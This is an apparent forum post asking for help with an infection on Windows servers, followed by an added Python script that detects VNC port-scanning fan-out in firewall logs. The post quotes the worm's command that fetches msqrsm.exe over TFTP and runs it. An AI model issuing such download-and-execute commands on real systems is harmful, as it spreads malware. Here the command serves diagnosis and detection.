
tftp -i 0.0.0.0 GET msqrsm.exe

Hi all, this is my first post.

My company has 4 servers: 3 are running Windows 2000 and 1 is running Windows 2003. 4 days ago, when I was using VNC to remote into my company servers from my home, I saw all the servers automatically open a cmd command in Run, and the command automatically typed was tftp -i 0.0.0.0 GET msqrsm.exe and then msqrsm.exe. I checked the firewall log, and it always had my server SRC address 192.168.0.3 going to DEST address 192.168.x.x (x.x means random), SRC port 22xx (xx means random), DEST port 5900, and in 1 minute it can send many packets to random private IPs....

Can any brother tell me what type of virus infected them, and how to fix this problem?


Thanks !!!
Wilson
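
Added example, not part of the original post: a short script that flags the firewall-log pattern described above, where one source contacts many different addresses on port 5900 within a minute. The log line layout, the sample lines, the host 192.168.0.20 and the threshold are constructed assumptions; adapt the regex to the real firewall's export format.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in an assumed "timestamp SRC=ip:port DST=ip:port" layout.
SAMPLE_LOG = """\
2024-01-01 10:00:01 SRC=192.168.0.3:2201 DST=192.168.14.7:5900
2024-01-01 10:00:05 SRC=192.168.0.3:2202 DST=192.168.201.33:5900
2024-01-01 10:00:09 SRC=192.168.0.3:2203 DST=192.168.77.140:5900
2024-01-01 10:00:14 SRC=192.168.0.20:3311 DST=192.168.0.5:5900
2024-01-01 10:00:20 SRC=192.168.0.3:2204 DST=192.168.5.91:5900
2024-01-01 10:00:31 SRC=192.168.0.3:2205 DST=192.168.160.2:5900
2024-01-01 10:00:40 SRC=192.168.0.20:3312 DST=192.168.0.5:5900
2024-01-01 10:00:44 SRC=192.168.0.3:2206 DST=192.168.98.250:5900
2024-01-01 10:00:50 SRC=192.168.0.20:3313 DST=192.168.0.9:445
truncated line without fields
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) "
    r"SRC=(?P<src>[\d.]+):\d+ DST=(?P<dst>[\d.]+):(?P<dport>\d+)$"
)

def find_fanout(log_text, dport=5900, window=timedelta(minutes=1), threshold=5):
    """Map each source to the most distinct destinations it reached on dport
    inside any sliding window, keeping only sources at or above threshold."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m or int(m["dport"]) != dport:
            continue  # skip malformed lines and traffic to other ports
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        events[m["src"]].append((ts, m["dst"]))
    flagged = {}
    for src, hits in events.items():
        hits.sort()
        start, best = 0, 0
        for end in range(len(hits)):
            # shrink the window from the left until it spans at most `window`
            while hits[end][0] - hits[start][0] > window:
                start += 1
            best = max(best, len({dst for _, dst in hits[start:end + 1]}))
        if best >= threshold:
            flagged[src] = best
    return flagged

if __name__ == "__main__":
    print(find_fanout(SAMPLE_LOG))
```

A host that repeatedly connects to a single VNC server stays below the threshold, because the count is of distinct destinations rather than packets.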